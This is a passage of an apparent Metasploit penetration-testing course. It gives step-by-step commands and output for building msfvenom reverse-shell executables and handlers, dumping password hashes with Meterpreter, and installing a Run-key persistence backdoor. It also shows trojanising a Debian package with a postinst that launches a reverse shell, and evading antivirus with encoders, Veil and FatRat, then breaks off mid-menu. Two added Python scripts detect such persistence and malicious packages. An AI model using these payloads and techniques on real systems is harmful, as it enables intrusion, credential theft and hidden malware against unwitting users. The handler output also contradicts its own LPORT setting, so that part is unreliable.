[*] 192.168.2.12:445 - Host is running Windows 2003 SP2 (build:3790) (name:IMP-SERVER3) (workgroup:WORKGROUP )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Importing External Modules in Metasploit

Often there is no module in the Metasploit Framework for the vulnerability you need, but a
module written by someone else is available, for example on Exploit-DB. Such modules can be
dropped into your own module tree. As an example we will import this exploit from Exploit-DB
into Metasploit:
https://www.exploit-db.com/exploits/31433/
Open a terminal and navigate to the Desktop:

root@kali:~# cd Desktop
root@kali:~/Desktop#

Create a Ruby file with the .rb extension using nano and paste all the code from the link into the
file. (Only exploits written as Metasploit modules in Ruby can be imported this way; a
stand-alone exploit in another language has to be run outside the framework.)

root@kali:~/Desktop# nano exp1.rb


Paste the code and save the file (Ctrl+X, then Y to confirm).

Now run the following commands. The directory below ~/.msf4/modules/exploits/ becomes the
module's path and the file name its module name, so exp1.rb in exploits/test/ is reached as
exploit/test/exp1:

root@kali:~/Desktop# mkdir -p $HOME/.msf4/modules/exploits/test
root@kali:~/Desktop# cp exp1.rb $HOME/.msf4/modules/exploits/test

Open msfconsole and reload the module tree so that it picks up the new file:

msf > reload_all
msf > use exploit/test/exp1
msf exploit(exp1) >

The exploit has been added and we can now use it (run show options to see what it requires).

Client Side Attacks

Client-side exploits are a major front for attackers today. As network administrators and
software developers fortify the perimeter, pentesters need a way to make the victims open the
door for them to get into the network. Client-side exploits require user interaction, such as
enticing the user to click a link, open a document, or visit a malicious website.
Binary Payloads
One of the interesting features of Metasploit is the ability to generate a stand-alone executable
from a Metasploit payload. This is very useful in social engineering: if you can get a user to run
your payload for you, there is no need to exploit any software at all.
Let’s generate a reverse-shell payload with the command line tool msfvenom, execute it on a
remote system, and receive our shell. We'll generate a Windows executable that connects back to
us on port 31337:

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.109 LPORT=31337 -f exe > /root/Desktop/game.exe

We have created an exe file named game.exe

root@kali:~# cd Desktop/
root@kali:~/Desktop# file game.exe
game.exe: PE32 executable (GUI) Intel 80386, for MS Windows

Now we have a Windows executable ready to go. On our side we use exploit/multi/handler, a
generic listener that catches the connection from payloads launched outside the framework. It
must be configured with exactly the same payload, LHOST and LPORT as the executable:

root@kali:~/Desktop# service postgresql start


root@kali:~/Desktop# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.3.109
LHOST => 192.168.3.109
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description


---- --------------- -------- -----------


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description


---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.3.109 yes The listen address
LPORT 31337 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > run

[*] Started reverse handler on 192.168.3.109:31337


[*] Starting the payload handler...

Everything is now set up. We need to get game.exe onto the victim’s computer and have it
executed; this is the social-engineering step. As soon as the victim runs the file, it connects back
to our handler and we get a Meterpreter session.


Meterpreter Shell
Meterpreter is a payload that runs in memory on the target and provides various post-exploitation
functions. It comes with its own set of commands; the following section covers some of them.
To get a list of commands, type help:

meterpreter > help

To list the contents of the current directory, type ls:

meterpreter > ls
Listing: C:\
============

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
100777/rwxrwxrwx  0          fil   2016-11-03 10:16:25 -0400  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   2016-11-03 10:16:25 -0400  CONFIG.SYS
40777/rwxrwxrwx   0          dir   2016-11-03 10:21:44 -0400  Documents and Settings
100444/r--r--r--  0          fil   2016-11-03 10:16:25 -0400  IO.SYS
100444/r--r--r--  0          fil   2016-11-03 10:16:25 -0400  MSDOS.SYS
100555/r-xr-xr-x  47580      fil   2003-03-31 07:00:00 -0500  NTDETECT.COM
40555/r-xr-xr-x   0          dir   2016-11-03 02:26:28 -0400  Program Files
40777/rwxrwxrwx   0          dir   2016-11-03 10:21:32 -0400  System Volume Information
40777/rwxrwxrwx   0          dir   2016-11-03 02:45:26 -0400  WINDOWS
100666/rw-rw-rw-  194        fil   2016-11-03 10:13:42 -0400  boot.ini
100444/r--r--r--  233632     fil   2003-03-31 07:00:00 -0500  ntldr
100666/rw-rw-rw-  402653184  fil   2016-11-04 03:51:09 -0400  pagefile.sys

To get a screenshot of the target’s desktop use the following command:

meterpreter > screenshot


Screenshot saved to: /root/DhZkcjtB.jpeg

Running getuid will display the user that the Meterpreter server is running as on the host.

meterpreter > getuid


Server username: NT AUTHORITY\SYSTEM

The hashdump command dumps the password hashes stored in the SAM database. Note: it only
works if Meterpreter is running with SYSTEM privileges (compare the output of getuid above).

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:7c00edaf596c339bbc367d53a1f70c48:b73b919d7fd1aa8c22e14eb4f27f5002:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1701d9d72371d102d47978eec32772eb:::

Each line has the form user:RID:LM hash:NT hash. The LM value aad3b435b51404eeaad3b435b51404ee
means no LM hash is stored (LM hashing is disabled or the password is empty), and the NT value
31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password. NT hashes are unsalted,
so they can be cracked offline with a dictionary attack, or used directly in pass-the-hash attacks
without cracking them at all.
A great feature of Meterpreter is that it can migrate itself into another running process, for
instance to survive the exploited application being closed or to blend in with a stable system
process. Run the ps command to list the running processes:

meterpreter > ps

Process List
============

PID   PPID  Name               Arch  Session  User                          Path
---   ----  ----               ----  -------  ----                          ----
0     0     [System Process]
4     0     System             x86   0        NT AUTHORITY\SYSTEM
132   828   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\System32\wbem\wmiprvse.exe
440   536   services.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
516   4     smss.exe           x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
580   516   csrss.exe          x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
604   516   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
648   604   services.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
660   604   lsass.exe          x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
828   648   svchost.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
928   648   svchost.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
1120  648   svchost.exe        x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\System32\svchost.exe
1164  648   svchost.exe        x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\svchost.exe
1216  928   wuauclt.exe        x86   0        IMP-SERVER2\Administrator     C:\WINDOWS\System32\wuauclt.exe
1348  1304  explorer.exe       x86   0        IMP-SERVER2\Administrator     C:\WINDOWS\Explorer.EXE
1356  604   logon.scr          x86   0        IMP-SERVER2\Administrator     C:\WINDOWS\System32\logon.scr
1460  648   spoolsv.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
1528  1348  vmtoolsd.exe       x86   0        IMP-SERVER2\Administrator     C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1784  648   VGAuthService.exe  x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1884  648   vmtoolsd.exe       x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe

Now we will migrate to another process. Note the PID of the process you want to migrate into:

meterpreter > migrate 828
[*] Migrating from 928 to 828...
[*] Migration completed successfully.

Persistent Backdoors
After compromising a vulnerable machine, we may want to reconnect to it later, so it is a good idea to leave ourselves an easier way back into the system: if the exploited service is patched or goes down, we need an alternate way to connect. Meterpreter has a persistence script that creates a Meterpreter service which remains available to you even if the remote system is rebooted.

Once we have exploited the machine and have a Meterpreter shell, run the persistence script:

meterpreter > run persistence -h

Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

Several options are available; we will run the script with the following ones:

meterpreter > run persistence -A -i 10 -p 4434 -r 192.167.0.6
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/IMP-SERVER2_20170201.2933/IMP-SERVER2_20170201.2933.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.167.0.6 LPORT=4434
[*] Persistent agent script is 99663 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\XLNWIfcpRx.vbs
[*] Starting connection handler at port 4434 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\WINDOWS\TEMP\XLNWIfcpRx.vbs
[+] Agent executed with PID 1952
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\BxAakoDADlggUG
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\BxAakoDADlggUG

Here -A automatically starts a matching multi/handler to connect to the agent; -X means the agent starts automatically when the system boots; -i 10 is the number of seconds to wait between connection attempts; -p 4434 is the port on which the Metasploit handler will be listening; and -r 192.167.0.6 is the IP of the attacker machine.
After some time, a new connection is created:

meterpreter > [*] Meterpreter session 2 opened (192.167.0.6:4434 -> 192.168.2.9:1034) at 2017-02-01 03:29:48 -0500

meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms08_067_netapi) > sessions -i

Active sessions
===============

 Id  Type                     Information                          Connection
 --  ----                     -----------                          ----------
 1   meterpreter x86/windows  NT AUTHORITY\SYSTEM @ IMP-SERVER2    192.167.0.6:4444 -> 192.168.2.9:1033 (192.168.2.9)
 2   meterpreter x86/windows  NT AUTHORITY\SYSTEM @ IMP-SERVER2    192.167.0.6:4434 -> 192.168.2.9:1034 (192.168.2.9)

We send our current session to the background with the background command and then list the sessions. There are two: session 1 is the initial one on port 4444 and session 2 is our persistent backdoor on port 4434.
We now reboot the system and create a handler. As soon as the system reboots we will get a reverse shell.

meterpreter > reboot
Rebooting...

As soon as the system reboots we get a new connection:

msf exploit(handler) > [*] Meterpreter session 5 opened (192.167.0.6:4434 -> 192.168.2.9:1027) at 2017-02-01 03:41:36 -0500

msf exploit(handler) > sessions -i

Active sessions
===============

 Id  Type                     Information                                Connection
 --  ----                     -----------                                ----------
 5   meterpreter x86/windows  IMP-SERVER2\Administrator @ IMP-SERVER2    192.167.0.6:4434 -> 192.168.2.9:1027 (192.168.2.9)
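
The run above leaves two artefacts a defender can look for: a randomly named .vbs in C:\WINDOWS\TEMP and a randomly named value under the HKLM Run key pointing at it. The Python below is an added example (not from the course material or Metasploit) that turns those observations into heuristics and applies them to a constructed list of Run-key entries; the vendor entry names and commands are made up, and the suspicious one mirrors the output above.

```python
r"""Audit Run-key autostart entries for the traces a persistence agent leaves.

Added example, not part of the course material. Heuristics are taken from the
output above: a randomly named value under HKLM\...\CurrentVersion\Run, a
script file in C:\WINDOWS\TEMP, and a script interpreter at logon. The entries
in SAMPLE_ENTRIES are constructed, as an exported registry scan might list them.
"""
import math
import re
from dataclasses import dataclass

RUN_KEYS = (
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
)
SCRIPT_HOSTS = re.compile(r"\b(wscript|cscript|mshta|powershell|cmd)(\.exe)?\b", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|hta|ps1|bat|cmd)\b", re.I)
TEMP_DIRS = re.compile(
    r"(\\windows\\temp\\|\\temp\\|\\tmp\\|\\appdata\\local\\temp\\|%temp%)", re.I)
# Signed vendor software normally starts from one of these roots.
TRUSTED_DIRS = re.compile(r'^"?[a-z]:\\(windows\\|program files( \(x86\))?\\)', re.I)


@dataclass(frozen=True)
class RunEntry:
    key: str
    name: str      # the registry value name
    command: str   # the value data, i.e. what runs at logon


def shannon_entropy(s: str) -> float:
    """Bits per character; random letter strings score high, real words score low."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def looks_random(name: str) -> bool:
    """Letters only, long, high entropy and frequent case switches (e.g. BxAakoDADlggUG)."""
    if not name.isalpha() or len(name) < 8:
        return False
    switches = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return shannon_entropy(name) >= 3.0 and switches >= 4


def audit(entries) -> dict[str, list[str]]:
    """Map value name -> heuristics tripped, for every entry that trips at least one."""
    report: dict[str, list[str]] = {}
    for e in entries:
        flags = []
        if looks_random(e.name):
            flags.append("random-looking value name")
        if SCRIPT_HOSTS.search(e.command) or SCRIPT_EXT.search(e.command):
            flags.append("script interpreter or script file at logon")
        if TEMP_DIRS.search(e.command):
            flags.append("runs from a temp directory")
        if not TRUSTED_DIRS.match(e.command):
            flags.append("target outside Windows/Program Files")
        if flags:
            report[e.name] = flags
    return report


# Constructed sample: three ordinary-looking entries and one matching the agent above.
SAMPLE_ENTRIES = [
    RunEntry(RUN_KEYS[0], "VMware User Process",
             r'"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr'),
    RunEntry(RUN_KEYS[0], "SecurityHealth", r"C:\WINDOWS\system32\SecurityHealthSystray.exe"),
    RunEntry(RUN_KEYS[1], "Discord",
             r"C:\Users\alice\AppData\Local\Discord\Update.exe --processStart Discord.exe"),
    RunEntry(RUN_KEYS[0], "BxAakoDADlggUG", r"C:\WINDOWS\TEMP\XLNWIfcpRx.vbs"),
]

if __name__ == "__main__":
    for name, flags in audit(SAMPLE_ENTRIES).items():
        print(f"{name}: {'; '.join(flags)}")
```

A per-user Run key entry outside the trusted roots (the Discord line) trips only the weakest heuristic, which is why the flags are reported separately rather than as a single score.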

Linux Trojan
To demonstrate that client-side attacks and trojans are not exclusive to the Windows world, we will package a Metasploit payload inside an Ubuntu .deb package to get a shell on Linux.
We first need to download the package we are going to infect and move it to a temporary working directory. In our example we will use the package 'chromium', a game available on the Ubuntu store.

root@kali:~/Desktop# apt-get --download-only install chromium

The package is downloaded into the /var/cache/apt/archives directory. Now we create a temporary directory to work in and move the package there.

root@kali:~# mkdir /tmp/evil
root@kali:~# cd /tmp/evil/
root@kali:/tmp/evil# mv /var/cache/apt/archives/chromium_46.0.2490.71-1~deb8u1_i386.deb /tmp/evil/

Next, we extract the package into a working directory and create a DEBIAN directory to hold our added "features".

root@kali:/tmp/evil# mkdir work
root@kali:/tmp/evil# dpkg -x chromium_46.0.2490.71-1~deb8u1_i386.deb work/
root@kali:/tmp/evil# mkdir work/DEBIAN
root@kali:/tmp/evil# cd work/
root@kali:/tmp/evil/work# cd DEBIAN/

In the 'DEBIAN' directory, create a file named 'control' that contains the following:

root@kali:/tmp/evil/work/DEBIAN# nano control

Package: Chromium
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers ([email protected])
Description: An indulging game with good graphics and gameplay

We also need a post-installation script that will execute our binary. In the 'DEBIAN' directory, create a file named 'postinst' that contains the following:

root@kali:/tmp/evil/work/DEBIAN# nano postinst

#!/bin/sh
sudo chmod 2755 /usr/bin/chromium_score && /usr/bin/chromium_score &
/usr/bin/chromium &

Now we create our malicious payload: a reverse shell that connects back to us, named 'chromium_score'.

root@kali:~/Desktop# msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.3.109 LPORT=443 X > /tmp/evil/work/usr/bin/chromium_score

We now make our post-installation script executable and build the new package. The built file will be named 'work.deb', so we rename it to 'chromium.deb' and copy the package to our web root directory.

root@kali:/tmp/evil/work/DEBIAN# chmod 755 postinst
root@kali:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work
dpkg-deb: building package `chromium' in `/tmp/evil/work.deb'.

We will need to set up the Metasploit multi/handler to receive the incoming connection.

msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(handler) > set LHOST 192.168.3.109
LHOST => 192.168.3.109
msf exploit(handler) > set LPORT 443
LPORT => 443

On our Ubuntu victim, we have somehow convinced the user to download and install our
awesome new game.

tester@ubuntu:~$ sudo dpkg -i chromium.deb

When the victim plays the game, we get our shell.
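
The maintainer scripts that dpkg runs as root can be read straight out of a .deb before it is installed, which is the check that catches a package built like the one above. The Python below is an added example (not part of the course material): it parses the .deb's ar container, reads the control tarball and flags the constructs used in the postinst above. The packages it inspects are constructed inside the script, so it runs offline.

```python
"""Inspect a .deb package's maintainer scripts before installing it.

Added example, not part of the course material. A .deb is an 'ar' archive with
three members (debian-binary, control.tar.*, data.tar.*); the maintainer
scripts that dpkg runs as root live in control.tar.*. This reads them straight
from the archive and flags the constructs used in the postinst above. The
sample packages are constructed here by build_sample_deb().
"""
import io
import re
import tarfile

MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm", "config"}

# (finding, pattern) pairs a reviewer would apply to a maintainer script.
RISK_PATTERNS = [
    ("sets setuid/setgid bit", re.compile(r"\bchmod\s+(?:[2467]\d{3}\b|[ugoa]*\+[a-z]*s)")),
    ("launches a background process", re.compile(r"[^&]&[ \t]*$", re.M)),
    ("pipes a download into a shell", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|da)?sh\b")),
    ("uses sudo (scripts already run as root)", re.compile(r"\bsudo\b")),
    ("raw network redirection", re.compile(r"/dev/(tcp|udp)/")),
]


def ar_members(blob: bytes):
    """Yield (name, data) for each member of a classic 'ar' archive."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive, so not a .deb")
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]          # 16 name, 12 mtime, 6 uid, 6 gid, 8 mode, 10 size, 2 magic
        if hdr[58:60] != b"`\n":
            raise ValueError(f"corrupt ar header at offset {pos}")
        name = hdr[0:16].decode("ascii").strip().rstrip("/")
        size = int(hdr[48:58].decode("ascii").strip())
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)     # member data is padded to an even offset


def inspect_deb(blob: bytes) -> dict[str, list[str]]:
    """Return {script: [findings]} for every maintainer script in the package."""
    report: dict[str, list[str]] = {}
    for name, data in ar_members(blob):
        if not name.startswith("control.tar"):
            continue
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
            for member in tar.getmembers():
                base = member.name.rsplit("/", 1)[-1]
                if member.isfile() and base in MAINTAINER_SCRIPTS:
                    text = tar.extractfile(member).read().decode("utf-8", "replace")
                    report[base] = [what for what, rx in RISK_PATTERNS if rx.search(text)]
    return report


# --- constructed sample packages -------------------------------------------

def _targz(files) -> bytes:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for fname, body, mode in files:
            info = tarfile.TarInfo(fname)
            info.size, info.mode = len(body), mode
            tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()


def _ar_member(name: str, data: bytes) -> bytes:
    hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
    return hdr + data + (b"\n" if len(data) % 2 else b"")


def build_sample_deb(postinst: str) -> bytes:
    """Minimal .deb: a stub control file, the given postinst and an empty data tarball."""
    control = b"Package: sample\nVersion: 0.1\nArchitecture: all\nMaintainer: x\nDescription: constructed\n"
    ctl = _targz([("./control", control, 0o644), ("./postinst", postinst.encode(), 0o755)])
    return (b"!<arch>\n" + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", ctl) + _ar_member("data.tar.gz", _targz([])))


# Same shape as the postinst shown above, versus a typical benign one.
TROJANED_POSTINST = """#!/bin/sh
sudo chmod 2755 /usr/bin/chromium_score && /usr/bin/chromium_score &
/usr/bin/chromium &
"""
BENIGN_POSTINST = """#!/bin/sh
set -e
if [ "$1" = "configure" ]; then
    update-desktop-database -q || true
fi
"""

if __name__ == "__main__":
    for label, script in (("trojaned", TROJANED_POSTINST), ("benign", BENIGN_POSTINST)):
        print(label, inspect_deb(build_sample_deb(script)))
```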

Bypassing Antivirus

Using msfvenom

Most Windows-based systems run some form of anti-virus protection because of the widespread malicious software targeting the platform. We will encode the executable we produce in an attempt to make it harder to detect, using msfvenom. Various encoders are available; we will use shikata_ga_nai. To list the available encoders, use the following command:

root@kali:~/Desktop# msfvenom -l encoders

root@kali:~/Desktop# msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform win LHOST=192.168.3.109 LPORT=443 -e x86/shikata_ga_nai -i 1 -f exe > /root/Desktop/game2.exe
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai chosen with final size 326
Payload size: 326 bytes

Following are the options for msfvenom:

Options:
    -p, --payload <payload>       Payload to use. Specify a '-' or stdin to use custom payloads
    -l, --list [module_type]      List a module type example: payloads, encoders, nops, all
    -n, --nopsled <length>        Prepend a nopsled of [length] size on to the payload
    -f, --format <format>         Output format (use --help-formats for a list)
    -e, --encoder [encoder]       The encoder to use
    -a, --arch <architecture>     The architecture to use
        --platform <platform>     The platform of the payload
    -s, --space <length>          The maximum size of the resulting payload
    -b, --bad-chars <list>        The list of characters to avoid example: '\x00\xff'
    -i, --iterations <count>      The number of times to encode the payload
    -c, --add-code <path>         Specify an additional win32 shellcode file to include
    -x, --template <path>         Specify a custom executable file to use as a template
    -k, --keep                    Preserve the template behavior and inject the payload as a new thread
        --payload-options         List the payload's standard options
    -o, --out <path>              Save the payload
    -v, --var-name <name>         Specify a custom variable name to use for certain output formats
    -h, --help                    Show this message
        --help-formats            List available formats

Copy game2.exe to the Windows PC and run it; you will get a shell.
If the antivirus still detects it, we try something different: use different encoders, two of which we tell it to run through 10 times each. This is about as much encoding as we can do and still have a working binary.

Using Veil-Evasion

Veil is used to bypass AV and generate payloads. It uses various methods to encrypt and obfuscate the payload to avoid detection.
To install Veil-Evasion, use the following command:

root@kali:~# apt-get install veil-evasion

Press Y to install the required files, and install all the dependencies it prompts for.

Now we are ready to use Veil-Evasion. Type veil in a terminal; it will prompt you to install Veil-Evasion, so select Yes. Type list to get a list of all available payloads:

[menu>>]: list
=========================================================================
Veil-Evasion | [Version]: 2.28.2
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
[*] Available Payloads:

1) auxiliary/coldwar_wrapper
2) auxiliary/macro_converter
3) auxiliary/pyinstaller_wrapper

4) c/meterpreter/rev_http
5) c/meterpreter/rev_http_service
6) c/meterpreter/rev_tcp
7) c/meterpreter/rev_tcp_service
8) c/shellcode_inject/flatc

9) cs/meterpreter/rev_http
10) cs/meterpreter/rev_https
11) cs/meterpreter/rev_tcp
12) cs/shellcode_inject/base64_substitution
13) cs/shellcode_inject/virtual

A large number of payloads is available. Use the use command with a payload number to select a specific payload:

[menu>>]: use 6
=========================================================================
Veil-Evasion | [Version]: 2.28.2
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

Payload: c/meterpreter/rev_tcp loaded

Required Options:

Name            Current Value  Description
----            -------------  -----------
COMPILE_TO_EXE  Y              Compile to an executable
LHOST                          IP of the Metasploit handler
LPORT           4444           Port of the Metasploit handler

Available Commands:

set       Set a specific option value
info      Show information about the payload
options   Show payload's options
generate  Generate payload
back      Go to the main menu
exit      exit Veil-Evasion

[c/meterpreter/rev_tcp>>]: set LHOST 192.168.3.103
[i] LHOST => 192.168.3.103

Generate the file and give it any name you like:

[ruby/meterpreter/rev_tcp>>]: generate
=========================================================================
[>] Please enter the base name for output files (default is 'payload'): myfile1

[*] Executable written to: /var/lib/veil-evasion/output/compiled/myfile1.exe

Language: c
Payload: c/meterpreter/rev_tcp
Required Options: COMPILE_TO_EXE=Y LHOST=192.168.3.103 LPORT=4444
Payload File: /var/lib/veil-evasion/output/source/myfile1.c
Handler File: /var/lib/veil-evasion/output/handlers/myfile1_handler.rc
[*] Your payload files have been generated, don't get caught!
[!] And don't submit samples to any online scanner! ;)

The executable has been saved at the location shown. Encrypted payloads can be used as well. Now we need to start a handler in msfconsole. Type msfconsole in a terminal:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.3.103
LHOST => 192.168.3.103
msf exploit(handler) > set LPORT 4444
LPORT => 8080
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.3.103:8080
[*] Starting the payload handler...

We have copied our exe to the target's Windows machine; when the user clicks on it we get a reverse connection.

FatRat

An easy tool to generate undetectable backdoors and for post-exploitation attacks. It compiles malware with popular payloads, and the compiled malware can be executed on Windows, Android and Mac.

To download FatRat use the following command:

root@kali:~# git clone https://github.com/Screetsec/TheFatRat.git

After it has been downloaded, extract the files from the zipped folder and go into the FatRat directory.

To make the scripts executable, run the following commands:

root@kali:~# chmod +x powerfull.sh
root@kali:~# chmod +x fatrat
root@kali:~# chmod +x setup.sh

To install FatRat use the following command:

root@kali:~# ./setup.sh

Now we are ready to use FatRat. Type fatrat in a terminal to start it. It lists all the available modules that can be used.

Creating Exe file with FatRat

To create a binary executable file, select any module of your choice and enter its number.
We will use option 6 "Create Fud Backdoor 1000% with PwnWinds [Excelent]". Type 6 in the terminal.

[01] Create Backdoor with msfvenom
[02] Create Fud 100% Backdoor with Fudwin 1.0
[03] Create Fud Backdoor with Avoid v1.2
[04] Create Fud Backdoor with backdoor-factory [embed]
[05] Backdooring Original apk [Instagram, Line,etc]
[06] Create Fud Backdoor 1000% with PwnWinds [Excelent]
[07] Create Backdoor For Office with Microsploit
[08] Load/Create auto listeners
[09] Jump to msfconsole
[10] Searchsploit
[11] File Pumper [Increase Your Files Size]
[12] Configure Default Lhost & Lport
[13] Cleanup
[14] Help
[15] Credits
[16] Exit

┌─[TheFatRat]──[~]─[menu]:
└─────► 6

You will then see a new menu similar to the one below. Choose option 6 "Create Backdoor with C / Meteperter_reverse_tcp (FUD 97%)".

[1] Create a bat file+Powershell (FUD 100%)
[2] Create exe file with C# + Powershell (FUD 100%)
[3] Create exe file with apache + Powershell (FUD 100%)
[4] Create exe file with C + Powershell (FUD 98 %)
[5] Create Backdoor with C + Powershell + Embed Pdf (FUD 80%)
[6] Create Backdoor with C /  Meteperter_reverse_tcp (FUD 97%)
[7] Create Backdoor with C / Metasploit Staging Protocol (FUD 98%)
[8] Back to Menu

┌─[TheFatRat]──[~]─[pwnwind]:
└─────► 6

It will then prompt you to enter LHOST, LPORT and a file name.

Your local IPV4 address is : 192.168.3.103
Your local IPV6 address is : fe80::20c:29ff:fe3d:718a
Your public IP address is : 101.50.81.19
Your Hostname is : ntl-50-81-19.nayatel.com

Set LHOST IP: 192.168.3.103
Set LPORT: 4444
Please enter the base name for output files :Myfile

It automatically creates the exe file named "Myfile", saved to the output folder in the FatRat directory.

[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]

Generate Backdoor
+------------++-------------------------++-----------------------+
| Name || Descript || Your Input
+------------++-------------------------++-----------------------+
| LHOST || The Listen Addres || 192.168.3.103
| LPORT || The Listen Ports || 4444
| OUTPUTNAME || The Filename output || Myfile
| PAYLOAD || Payload To Be Used ||
+------------++-------------------------++-----------------------+

[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]

[+]Compiling Binary Done
Press Enter key to Contiune ...

Now we need to start a handler in msfconsole. Type msfconsole in a terminal:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.3.103
LHOST => 192.168.3.103
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.3.103:4444
[*] Starting the payload handler...

We have copied our exe to the target's Windows machine; when the user clicks on it we get a reverse connection.

Creating Malicious Word file with FatRat

To create a malicious Word file, select option 7 "Create Backdoor For Office with Microsploit". Type 7 in the terminal.

[01] Create Backdoor with msfvenom
[02] Create Fud 100% Backdoor with Fudwin 1.0
[03] Create Fud Backdoor with Avoid v1.2
[04] Create Fud Backdoor with backdoor-factory [embed]
[05] Backdooring Original apk [Instagram, Line,etc]
[06] Create Fud Backdoor 1000% with PwnWinds [Excelent]
[07] Create Backdoor For Office with Microsploit
[08] Load/Create auto listeners
[09] Jump to msfconsole
[10] Searchsploit
[11] File Pumper [Increase Your Files Size]
[12] Configure Default Lhost & Lport
[13] Cleanup
[14] Help
[15] Credits
[16] Exit

┌─[TheFatRat]──[~]─[menu]:
└─────► 7

